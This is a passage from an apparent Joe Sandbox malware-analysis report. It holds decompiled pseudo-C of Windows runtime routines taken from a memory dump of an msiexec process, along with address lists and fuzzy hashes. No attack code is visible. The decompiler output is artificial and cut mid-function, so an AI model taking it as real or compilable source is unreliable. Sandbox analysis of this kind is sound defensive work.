                              										_t163 = 0;
                              										L19:
                              										_v568 = 0x4ce11c4;
                              									}
                              									L20:
                              									_v588 = _t163;
                              									_v564 = _t163 + _t163;
                              									_t306 =  *_v568 & 0x0000ffff;
                              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                              									_v576 = _t265;
                              									if(_t265 > 0xfffe) {
                              										L90:
                              										_t322 = 0xc0000106;
                              									} else {
                              										if(_t321 != 0) {
                              											if(_t265 > (_t321[1] & 0x0000ffff)) {
                              												if(_v580 != 0) {
                              													goto L23;
                              												} else {
                              													_t322 = 0xc0000106;
                              													goto L39;
                              												}
                              											} else {
                              												_t177 = _t306;
                              												goto L25;
                              											}
                              											goto L101;
                              										} else {
                              											if(_v580 == _t321) {
                              												_t322 = 0xc000000d;
                              											} else {
                              												L23:
                              												_t173 = L04D24620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                              												_t269 = _v592;
                              												_t269[2] = _t173;
                              												if(_t173 == 0) {
                              													_t322 = 0xc0000017;
                              												} else {
                              													_t316 = _v556;
                              													 *_t269 = 0;
                              													_t321 = _t269;
                              													_t269[1] = _v576;
                              													_t177 =  *_v568 & 0x0000ffff;
                              													L25:
                              													_v580 = _t177;
                              													if(_t177 == 0) {
                              														L29:
                              														_t307 =  *_t321 & 0x0000ffff;
                              													} else {
                              														_t290 =  *_t321 & 0x0000ffff;
                              														_v576 = _t290;
                              														_t310 = _t177 & 0x0000ffff;
                              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                              															_t307 =  *_t321 & 0xffff;
                              														} else {
                              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                              															E04D4F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                              															_t329 = _t329 + 0xc;
                              															_t311 = _v580;
                              															_t225 =  *_t321 + _t311 & 0x0000ffff;
                              															 *_t321 = _t225;
                              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                              															}
                              															goto L29;
                              														}
                              													}
                              													_t271 = _v556 - _v588 + _v588;
                              													_v580 = _t307;
                              													_v576 = _t271;
                              													if(_t271 != 0) {
                              														_t308 = _t271 & 0x0000ffff;
                              														_v588 = _t308;
                              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                              															E04D4F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                              															_t329 = _t329 + 0xc;
                              															_t213 =  *_t321 + _v576 & 0x0000ffff;
                              															 *_t321 = _t213;
                              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                              															}
                              														}
                              													}
                              													_t272 = _v560;
                              													if(_t272 != 0) {
                              														 *_t272 = _t321;
                              													}
                              													_t306 = 0;
                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                              													_t275 = _v572;
                              													if(_t275 != 0) {
                              														_t306 =  *_t275;
                              														if(_t306 != 0) {
                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                              														}
                              													}
                              													_t181 = _v544;
                              													if(_t181 != 0) {
                              														 *_t181 = 0;
                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                              														if(_v540 == 5) {
                              															_t182 = E04D052A5(1);
                              															_v588 = _t182;
                              															if(_t182 == 0) {
                              																E04D1EB70(1, 0x4df79a0);
                              																goto L38;
                              															} else {
                              																_v560 = _t182 + 0xc;
                              																_t185 = E04D1AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                              																if(_t185 == 0) {
                              																	_t324 = _v588;
                              																	goto L97;
                              																} else {
                              																	_t306 = _v544;
                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                              																	 *(_t306 + 4) = _t282;
                              																	_v576 = _t282;
                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                              																	 *_t306 = _t325;
                              																	if( *_t282 == 0x5c) {
                              																		_t149 = _t325 - 2; // -2
                              																		_t283 = _t149;
                              																		 *_t306 = _t283;
                              																		 *(_t306 + 4) = _v576 + 2;
                              																		_t185 = _t283 & 0x0000ffff;
                              																	}
                              																	_t324 = _v588;
                              																	 *(_t306 + 2) = _t185;
                              																	if((_v548 & 0x00000002) == 0) {
                              																		L97:
                              																		asm("lock xadd [esi], eax");
                              																		if((_t185 | 0xffffffff) == 0) {
                              																			_push( *((intOrPtr*)(_t324 + 4)));
                              																			E04D495D0();
                              																			L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                              																		}
                              																	} else {
                              																		 *(_t306 + 0xc) = _t324;
                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                              																	}
                              																	goto L38;
                              																}
                              															}
                              															goto L41;
                              														}
                              													}
                              													L38:
                              													_t322 = 0;
                              												}
                              											}
                              										}
                              									}
                              									L39:
                              									if(_t254 !=  &_v532) {
                              										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                              									}
                              									_t169 = _t322;
                              								}
                              								goto L41;
                              							}
                              							goto L68;
                              						}
                              					}
                              					L41:
                              					_pop(_t317);
                              					_pop(_t323);
                              					_pop(_t255);
                              					return E04D4B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                              				} else {
                              					_t299 = __edx[2];
                              					if( *_t299 == 0x5c) {
                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                              						if(_t256 != 0x5c) {
                              							if(_t256 != 0x3f) {
                              								goto L2;
                              							} else {
                              								goto L50;
                              							}
                              						} else {
                              							L50:
                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                              								goto L2;
                              							} else {
                              								_t251 = E04D43D43(_t315, _t321, _t157, _v560, _v572, _t305);
                              								_pop(_t319);
                              								_pop(_t326);
                              								_pop(_t257);
                              								return E04D4B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                              							}
                              						}
                              					} else {
                              						L2:
                              						_t260 = _v572;
                              						goto L3;
                              					}
                              				}
                              				L101:
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
                              • Instruction ID: 06e23f38455c19e949b8300bdf2f5d948799a9f8f693996fb80b80297b6db43d
                              • Opcode Fuzzy Hash: 242bf0a149ead14822305f735e6c94b795d969396949abcae830cb5d3dd3d35b
                              • Instruction Fuzzy Hash: 74F18F746086618FC724CF19C590A3AB7E1FFA8718F14892EF8C6CB250E774E991DB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E04D320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                              				signed int _v16;
                              				signed int _v20;
                              				signed char _v24;
                              				intOrPtr _v28;
                              				signed int _v32;
                              				void* _v36;
                              				char _v48;
                              				signed int _v52;
                              				signed int _v56;
                              				unsigned int _v60;
                              				char _v64;
                              				unsigned int _v68;
                              				signed int _v72;
                              				char _v73;
                              				signed int _v74;
                              				char _v75;
                              				signed int _v76;
                              				void* _v81;
                              				void* _v82;
                              				void* _v89;
                              				void* _v92;
                              				void* _v97;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed char _t128;
                              				void* _t129;
                              				signed int _t130;
                              				void* _t132;
                              				signed char _t133;
                              				intOrPtr _t135;
                              				signed int _t137;
                              				signed int _t140;
                              				signed int* _t144;
                              				signed int* _t145;
                              				intOrPtr _t146;
                              				signed int _t147;
                              				signed char* _t148;
                              				signed int _t149;
                              				signed int _t153;
                              				signed int _t169;
                              				signed int _t174;
                              				signed int _t180;
                              				void* _t197;
                              				void* _t198;
                              				signed int _t201;
                              				intOrPtr* _t202;
                              				intOrPtr* _t205;
                              				signed int _t210;
                              				signed int _t215;
                              				signed int _t218;
                              				signed char _t221;
                              				signed int _t226;
                              				char _t227;
                              				signed int _t228;
                              				void* _t229;
                              				unsigned int _t231;
                              				void* _t235;
                              				signed int _t240;
                              				signed int _t241;
                              				void* _t242;
                              				signed int _t246;
                              				signed int _t248;
                              				signed int _t252;
                              				signed int _t253;
                              				void* _t254;
                              				intOrPtr* _t256;
                              				intOrPtr _t257;
                              				unsigned int _t262;
                              				signed int _t265;
                              				void* _t267;
                              				signed int _t275;
                              
                              				_t198 = __ebx;
                              				_t267 = (_t265 & 0xfffffff0) - 0x48;
                              				_v68 = __ecx;
                              				_v73 = 0;
                              				_t201 = __edx & 0x00002000;
                              				_t128 = __edx & 0xffffdfff;
                              				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                              				_v72 = _t128;
                              				if((_t128 & 0x00000008) != 0) {
                              					__eflags = _t128 - 8;
                              					if(_t128 != 8) {
                              						L69:
                              						_t129 = 0xc000000d;
                              						goto L23;
                              					} else {
                              						_t130 = 0;
                              						_v72 = 0;
                              						_v75 = 1;
                              						L2:
                              						_v74 = 1;
                              						_t226 =  *0x4df8714; // 0x0
                              						if(_t226 != 0) {
                              							__eflags = _t201;
                              							if(_t201 != 0) {
                              								L62:
                              								_v74 = 1;
                              								L63:
                              								_t130 = _t226 & 0xffffdfff;
                              								_v72 = _t130;
                              								goto L3;
                              							}
                              							_v74 = _t201;
                              							__eflags = _t226 & 0x00002000;
                              							if((_t226 & 0x00002000) == 0) {
                              								goto L63;
                              							}
                              							goto L62;
                              						}
                              						L3:
                              						_t227 = _v75;
                              						L4:
                              						_t240 = 0;
                              						_v56 = 0;
                              						_t252 = _t130 & 0x00000100;
                              						if(_t252 != 0 || _t227 != 0) {
                              							_t240 = _v68;
                              							_t132 = E04D32EB0(_t240);
                              							__eflags = _t132 - 2;
                              							if(_t132 != 2) {
                              								__eflags = _t132 - 1;
                              								if(_t132 == 1) {
                              									goto L25;
                              								}
                              								__eflags = _t132 - 6;
                              								if(_t132 == 6) {
                              									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                              									if( *((short*)(_t240 + 4)) != 0x3f) {
                              										goto L40;
                              									}
                              									_t197 = E04D32EB0(_t240 + 8);
                              									__eflags = _t197 - 2;
                              									if(_t197 == 2) {
                              										goto L25;
                              									}
                              								}
                              								L40:
                              								_t133 = 1;
                              								L26:
                              								_t228 = _v75;
                              								_v56 = _t240;
                              								__eflags = _t133;
                              								if(_t133 != 0) {
                              									__eflags = _t228;
                              									if(_t228 == 0) {
                              										L43:
                              										__eflags = _v72;
                              										if(_v72 == 0) {
                              											goto L8;
                              										}
                              										goto L69;
                              									}
                              									_t133 = E04D058EC(_t240);
                              									_t221 =  *0x4df5cac; // 0x16
                              									__eflags = _t221 & 0x00000040;
                              									if((_t221 & 0x00000040) != 0) {
                              										_t228 = 0;
                              										__eflags = _t252;
                              										if(_t252 != 0) {
                              											goto L43;
                              										}
                              										_t133 = _v72;
                              										goto L7;
                              									}
                              									goto L43;
                              								} else {
                              									_t133 = _v72;
                              									goto L6;
                              								}
                              							}
                              							L25:
                              							_t133 = _v73;
                              							goto L26;
                              						} else {
                              							L6:
                              							_t221 =  *0x4df5cac; // 0x16
                              							L7:
                              							if(_t133 != 0) {
                              								__eflags = _t133 & 0x00001000;
                              								if((_t133 & 0x00001000) != 0) {
                              									_t133 = _t133 | 0x00000a00;
                              									__eflags = _t221 & 0x00000004;
                              									if((_t221 & 0x00000004) != 0) {
                              										_t133 = _t133 | 0x00000400;
                              									}
                              								}
                              								__eflags = _t228;
                              								if(_t228 != 0) {
                              									_t133 = _t133 | 0x00000100;
                              								}
                              								_t229 = E04D44A2C(0x4df6e40, 0x4d44b30, _t133, _t240);
                              								__eflags = _t229;
                              								if(_t229 == 0) {
                              									_t202 = _a20;
                              									goto L100;
                              								} else {
                              									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                              									L15:
                              									_t202 = _a20;
                              									 *_t202 = _t135;
                              									if(_t229 == 0) {
                              										L100:
                              										 *_a4 = 0;
                              										_t137 = _a8;
                              										__eflags = _t137;
                              										if(_t137 != 0) {
                              											 *_t137 = 0;
                              										}
                              										 *_t202 = 0;
                              										_t129 = 0xc0000017;
                              										goto L23;
                              									} else {
                              										_t242 = _a16;
                              										if(_t242 != 0) {
                              											_t254 = _t229;
                              											memcpy(_t242, _t254, 0xd << 2);
                              											_t267 = _t267 + 0xc;
                              											_t242 = _t254 + 0x1a;
                              										}
                              										_t205 = _a4;
                              										_t25 = _t229 + 0x48; // 0x48
                              										 *_t205 = _t25;
                              										_t140 = _a8;
                              										if(_t140 != 0) {
                              											__eflags =  *((char*)(_t267 + 0xa));
                              											if( *((char*)(_t267 + 0xa)) != 0) {
                              												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                              											} else {
                              												 *_t140 = 0;
                              											}
                              										}
                              										_t256 = _a12;
                              										if(_t256 != 0) {
                              											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                              										}
                              										_t257 =  *_t205;
                              										_v48 = 0;
                              										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                              										_v56 = 0;
                              										_v52 = 0;
                              										_t144 =  *( *[fs:0x30] + 0x50);
                              										if(_t144 != 0) {
                              											__eflags =  *_t144;
                              											if( *_t144 == 0) {
                              												goto L20;
                              											}
                              											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                              											goto L21;
                              										} else {
                              											L20:
                              											_t145 = 0x7ffe0384;
                              											L21:
                              											if( *_t145 != 0) {
                              												_t146 =  *[fs:0x30];
                              												__eflags =  *(_t146 + 0x240) & 0x00000004;
                              												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                              													_t147 = E04D27D50();
                              													__eflags = _t147;
                              													if(_t147 == 0) {
                              														_t148 = 0x7ffe0385;
                              													} else {
                              														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                              													}
                              													__eflags =  *_t148 & 0x00000020;
                              													if(( *_t148 & 0x00000020) != 0) {
                              														_t149 = _v72;
                              														__eflags = _t149;
                              														if(__eflags == 0) {
                              															_t149 = 0x4ce5c80;
                              														}
                              														_push(_t149);
                              														_push( &_v48);
                              														 *((char*)(_t267 + 0xb)) = E04D3F6E0(_t198, _t242, _t257, __eflags);
                              														_push(_t257);
                              														_push( &_v64);
                              														_t153 = E04D3F6E0(_t198, _t242, _t257, __eflags);
                              														__eflags =  *((char*)(_t267 + 0xb));
                              														if( *((char*)(_t267 + 0xb)) != 0) {
                              															__eflags = _t153;
                              															if(_t153 != 0) {
                              																__eflags = 0;
                              																E04D87016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                              																L04D22400(_t267 + 0x20);
                              															}
                              															L04D22400( &_v64);
                              														}
                              													}
                              												}
                              											}
                              											_t129 = 0;
                              											L23:
                              											return _t129;
                              										}
                              									}
                              								}
                              							}
                              							L8:
                              							_t275 = _t240;
                              							if(_t275 != 0) {
                              								_v73 = 0;
                              								_t253 = 0;
                              								__eflags = 0;
                              								L29:
                              								_push(0);
                              								_t241 = E04D32397(_t240);
                              								__eflags = _t241;
                              								if(_t241 == 0) {
                              									_t229 = 0;
                              									L14:
                              									_t135 = 0;
                              									goto L15;
                              								}
                              								__eflags =  *((char*)(_t267 + 0xb));
                              								 *(_t241 + 0x34) = 1;
                              								if( *((char*)(_t267 + 0xb)) != 0) {
                              									E04D22280(_t134, 0x4df8608);
                              									__eflags =  *0x4df6e48 - _t253; // 0x3071b30
                              									if(__eflags != 0) {
                              										L48:
                              										_t253 = 0;
                              										__eflags = 0;
                              										L49:
                              										E04D1FFB0(_t198, _t241, 0x4df8608);
                              										__eflags = _t253;
                              										if(_t253 != 0) {
                              											L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                              										}
                              										goto L31;
                              									}
                              									 *0x4df6e48 = _t241;
                              									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                              									__eflags = _t253;
                              									if(_t253 != 0) {
                              										_t57 = _t253 + 0x34;
                              										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                              										__eflags =  *_t57;
                              										if( *_t57 == 0) {
                              											goto L49;
                              										}
                              									}
                              									goto L48;
                              								}
                              								L31:
                              								_t229 = _t241;
                              								goto L14;
                              							}
                              							_v73 = 1;
                              							_v64 = _t240;
                              							asm("lock bts dword [esi], 0x0");
                              							if(_t275 < 0) {
                              								_t231 =  *0x4df8608; // 0x0
                              								while(1) {
                              									_v60 = _t231;
                              									__eflags = _t231 & 0x00000001;
                              									if((_t231 & 0x00000001) != 0) {
                              										goto L76;
                              									}
                              									_t73 = _t231 + 1; // 0x1
                              									_t210 = _t73;
                              									asm("lock cmpxchg [edi], ecx");
                              									__eflags = _t231 - _t231;
                              									if(_t231 != _t231) {
                              										L92:
                              										_t133 = E04D36B90(_t210,  &_v64);
                              										_t262 =  *0x4df8608; // 0x0
                              										L93:
                              										_t231 = _t262;
                              										continue;
                              									}
                              									_t240 = _v56;
                              									goto L10;
                              									L76:
                              									_t169 = E04D3E180(_t133);
                              									__eflags = _t169;
                              									if(_t169 != 0) {
                              										_push(0xc000004b);
                              										_push(0xffffffff);
                              										E04D497C0();
                              										_t231 = _v68;
                              									}
                              									_v72 = 0;
                              									_v24 =  *( *[fs:0x18] + 0x24);
                              									_v16 = 3;
                              									_v28 = 0;
                              									__eflags = _t231 & 0x00000002;
                              									if((_t231 & 0x00000002) == 0) {
                              										_v32 =  &_v36;
                              										_t174 = _t231 >> 4;
                              										__eflags = 1 - _t174;
                              										_v20 = _t174;
                              										asm("sbb ecx, ecx");
                              										_t210 = 3 |  &_v36;
                              										__eflags = _t174;
                              										if(_t174 == 0) {
                              											_v20 = 0xfffffffe;
                              										}
                              									} else {
                              										_v32 = 0;
                              										_v20 = 0xffffffff;
                              										_v36 = _t231 & 0xfffffff0;
                              										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                              										_v72 =  !(_t231 >> 2) & 0xffffff01;
                              									}
                              									asm("lock cmpxchg [edi], esi");
                              									_t262 = _t231;
                              									__eflags = _t262 - _t231;
                              									if(_t262 != _t231) {
                              										goto L92;
                              									} else {
                              										__eflags = _v72;
                              										if(_v72 != 0) {
                              											E04D4006A(0x4df8608, _t210);
                              										}
                              										__eflags =  *0x7ffe036a - 1;
                              										if(__eflags <= 0) {
                              											L89:
                              											_t133 =  &_v16;
                              											asm("lock btr dword [eax], 0x1");
                              											if(__eflags >= 0) {
                              												goto L93;
                              											} else {
                              												goto L90;
                              											}
                              											do {
                              												L90:
                              												_push(0);
                              												_push(0x4df8608);
                              												E04D4B180();
                              												_t133 = _v24;
                              												__eflags = _t133 & 0x00000004;
                              											} while ((_t133 & 0x00000004) == 0);
                              											goto L93;
                              										} else {
                              											_t218 =  *0x4df6904; // 0x400
                              											__eflags = _t218;
                              											if(__eflags == 0) {
                              												goto L89;
                              											} else {
                              												goto L87;
                              											}
                              											while(1) {
                              												L87:
                              												__eflags = _v16 & 0x00000002;
                              												if(__eflags == 0) {
                              													goto L89;
                              												}
                              												asm("pause");
                              												_t218 = _t218 - 1;
                              												__eflags = _t218;
                              												if(__eflags != 0) {
                              													continue;
                              												}
                              												goto L89;
                              											}
                              											goto L89;
                              										}
                              									}
                              								}
                              							}
                              							L10:
                              							_t229 =  *0x4df6e48; // 0x3071b30
                              							_v72 = _t229;
                              							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                              								E04D1FFB0(_t198, _t240, 0x4df8608);
                              								_t253 = _v76;
                              								goto L29;
                              							} else {
                              								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                              								asm("lock cmpxchg [esi], ecx");
                              								_t215 = 1;
                              								if(1 != 1) {
                              									while(1) {
                              										_t246 = _t215 & 0x00000006;
                              										_t180 = _t215;
                              										__eflags = _t246 - 2;
                              										_v56 = _t246;
                              										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                              										asm("lock cmpxchg [edi], esi");
                              										_t248 = _v56;
                              										__eflags = _t180 - _t215;
                              										if(_t180 == _t215) {
                              											break;
                              										}
                              										_t215 = _t180;
                              									}
                              									__eflags = _t248 - 2;
                              									if(_t248 == 2) {
                              										__eflags = 0;
                              										E04D400C2(0x4df8608, 0, _t235);
                              									}
                              									_t229 = _v72;
                              								}
                              								goto L14;
                              							}
                              						}
                              					}
                              				}
                              				_t227 = 0;
                              				_v75 = 0;
                              				if(_t128 != 0) {
                              					goto L4;
                              				}
                              				goto L2;
                              			}

                              0x04d75840
                              0x04d75845
                              0x04d75848
                              0x04d7584e
                              0x04d7584e
                              0x04d75848
                              0x04d32353
                              0x04d32355
                              0x04d32388
                              0x04d32388
                              0x04d32368
                              0x04d3236a
                              0x04d3236c
                              0x04d3238f
                              0x00000000
                              0x04d3236e
                              0x04d3236e
                              0x04d3218e
                              0x04d3218e
                              0x04d32191
                              0x04d32195
                              0x04d75a03
                              0x04d75a06
                              0x04d75a0c
                              0x04d75a0f
                              0x04d75a11
                              0x04d75a13
                              0x04d75a13
                              0x04d75a19
                              0x04d75a1f
                              0x00000000
                              0x04d3219b
                              0x04d3219b
                              0x04d321a0
                              0x04d32282
                              0x04d32284
                              0x04d32284
                              0x04d32284
                              0x04d32284
                              0x04d321a6
                              0x04d321a9
                              0x04d321ac
                              0x04d321ae
                              0x04d321b3
                              0x04d3228b
                              0x04d32290
                              0x04d32379
                              0x04d32296
                              0x04d32298
                              0x04d32298
                              0x04d32290
                              0x04d321b9
                              0x04d321be
                              0x04d322a2
                              0x04d322a2
                              0x04d321c4
                              0x04d321c8
                              0x04d321cc
                              0x04d321d0
                              0x04d321d4
                              0x04d321de
                              0x04d321e3
                              0x04d75a29
                              0x04d75a2c
                              0x00000000
                              0x00000000
                              0x04d75a3b
                              0x00000000
                              0x04d321e9
                              0x04d321e9
                              0x04d321e9
                              0x04d321ee
                              0x04d321f1
                              0x04d75a45
                              0x04d75a4b
                              0x04d75a52
                              0x04d75a58
                              0x04d75a5d
                              0x04d75a5f
                              0x04d75a71
                              0x04d75a61
                              0x04d75a6a
                              0x04d75a6a
                              0x04d75a76
                              0x04d75a79
                              0x04d75a7f
                              0x04d75a83
                              0x04d75a85
                              0x04d75a87
                              0x04d75a87
                              0x04d75a8c
                              0x04d75a91
                              0x04d75a97
                              0x04d75a9f
                              0x04d75aa0
                              0x04d75aa1
                              0x04d75aa6
                              0x04d75aab
                              0x04d75ab1
                              0x04d75ab3
                              0x04d75ab9
                              0x04d75aca
                              0x04d75ad4
                              0x04d75ad4
                              0x04d75ade
                              0x04d75ade
                              0x04d75aab
                              0x04d75a79
                              0x04d75a52
                              0x04d321f7
                              0x04d321f9
                              0x04d321fe
                              0x04d321fe
                              0x04d321e3
                              0x04d32195
                              0x04d3236c
                              0x04d32122
                              0x04d32122
                              0x04d32124
                              0x04d32231
                              0x04d32236
                              0x04d32236
                              0x04d32238
                              0x04d32238
                              0x04d32240
                              0x04d32242
                              0x04d32244
                              0x04d759fc
                              0x04d3218c
                              0x04d3218c
                              0x00000000
                              0x04d3218c
                              0x04d3224a
                              0x04d3224f
                              0x04d32256
                              0x04d32304
                              0x04d32309
                              0x04d3230f
                              0x04d3231e
                              0x04d3231e
                              0x04d3231e
                              0x04d32320
                              0x04d32325
                              0x04d3232a
                              0x04d3232c
                              0x04d3233e
                              0x04d3233e
                              0x00000000
                              0x04d3232c
                              0x04d32311
                              0x04d32317
                              0x04d3231a
                              0x04d3231c
                              0x04d32380
                              0x04d32380
                              0x04d32380
                              0x04d32384
                              0x00000000
                              0x00000000
                              0x04d32386
                              0x00000000
                              0x04d3231c
                              0x04d3225c
                              0x04d3225c
                              0x00000000
                              0x04d3225c
                              0x04d3212a
                              0x04d32134
                              0x04d32138
                              0x04d3213d
                              0x04d75858
                              0x04d75863
                              0x04d75863
                              0x04d75867
                              0x04d7586a
                              0x00000000
                              0x00000000
                              0x04d7586c
                              0x04d7586c
                              0x04d75871
                              0x04d75875
                              0x04d75877
                              0x04d75997
                              0x04d7599c
                              0x04d759a1
                              0x04d759a7
                              0x04d759a7
                              0x00000000
                              0x04d759a7
                              0x04d7587d
                              0x00000000
                              0x04d7588b
                              0x04d7588b
                              0x04d75890
                              0x04d75892
                              0x04d75894
                              0x04d75899
                              0x04d7589b
                              0x04d758a0
                              0x04d758a0
                              0x04d758aa
                              0x04d758b2
                              0x04d758b6
                              0x04d758be
                              0x04d758c6
                              0x04d758c9
                              0x04d7590d
                              0x04d75917
                              0x04d7591a
                              0x04d7591c
                              0x04d75920
                              0x04d75928
                              0x04d7592a
                              0x04d7592c
                              0x04d7592e
                              0x04d7592e
                              0x04d758cb
                              0x04d758cd
                              0x04d758d8
                              0x04d758e0
                              0x04d758f4
                              0x04d758fe
                              0x04d758fe
                              0x04d7593a
                              0x04d7593e
                              0x04d75940
                              0x04d75942
                              0x00000000
                              0x04d75944
                              0x04d75944
                              0x04d75949
                              0x04d7594e
                              0x04d7594e
                              0x04d75953
                              0x04d7595b
                              0x04d75976
                              0x04d75976
                              0x04d7597a
                              0x04d7597f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75981
                              0x04d75981
                              0x04d75981
                              0x04d75983
                              0x04d75988
                              0x04d7598d
                              0x04d75991
                              0x04d75991
                              0x00000000
                              0x04d7595d
                              0x04d7595d
                              0x04d75963
                              0x04d75965
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75967
                              0x04d75967
                              0x04d7596b
                              0x04d7596d
                              0x00000000
                              0x00000000
                              0x04d7596f
                              0x04d75971
                              0x04d75971
                              0x04d75974
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75974
                              0x00000000
                              0x04d75967
                              0x04d7595b
                              0x04d75942
                              0x04d75863
                              0x04d32143
                              0x04d32143
                              0x04d32149
                              0x04d3214f
                              0x04d322f1
                              0x04d322f6
                              0x00000000
                              0x04d32173
                              0x04d32173
                              0x04d3217d
                              0x04d32181
                              0x04d32186
                              0x04d759ae
                              0x04d759b2
                              0x04d759b5
                              0x04d759b7
                              0x04d759ba
                              0x04d759cd
                              0x04d759d1
                              0x04d759d5
                              0x04d759d9
                              0x04d759db
                              0x00000000
                              0x00000000
                              0x04d759dd
                              0x04d759dd
                              0x04d759e1
                              0x04d759e4
                              0x04d759e7
                              0x04d759ee
                              0x04d759ee
                              0x04d759f3
                              0x04d759f3
                              0x00000000
                              0x04d32186
                              0x04d3214f
                              0x04d32106
                              0x04d32266
                              0x04d320d8
                              0x04d320da
                              0x04d320e0
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb98d0fa2ec5474c9ba29c705fac4c00c3037a1544e425515796a62b07cd48
                              • Instruction ID: 248cfc91b59fdc9f57f95cd6ee2b187f524eb38ac956059fc2344ee26dd0df71
                              • Opcode Fuzzy Hash: 07eb98d0fa2ec5474c9ba29c705fac4c00c3037a1544e425515796a62b07cd48
                              • Instruction Fuzzy Hash: 01F1D235B08341AFEB25CF28C95076A77E1BF85325F08899DE9959B680E734F841CB93
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E04D1D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				signed int _v36;
                              				intOrPtr* _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed char _v52;
                              				signed int _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				signed int _v72;
                              				signed int _v76;
                              				intOrPtr _v80;
                              				signed int _v84;
                              				intOrPtr _v100;
                              				intOrPtr _v104;
                              				signed int _v108;
                              				signed int _v112;
                              				signed int _v116;
                              				intOrPtr _v120;
                              				signed int _v132;
                              				char _v140;
                              				char _v144;
                              				char _v157;
                              				signed int _v164;
                              				signed int _v168;
                              				signed int _v169;
                              				intOrPtr _v176;
                              				signed int _v180;
                              				signed int _v184;
                              				intOrPtr _v188;
                              				signed int _v192;
                              				signed int _v200;
                              				signed int _v208;
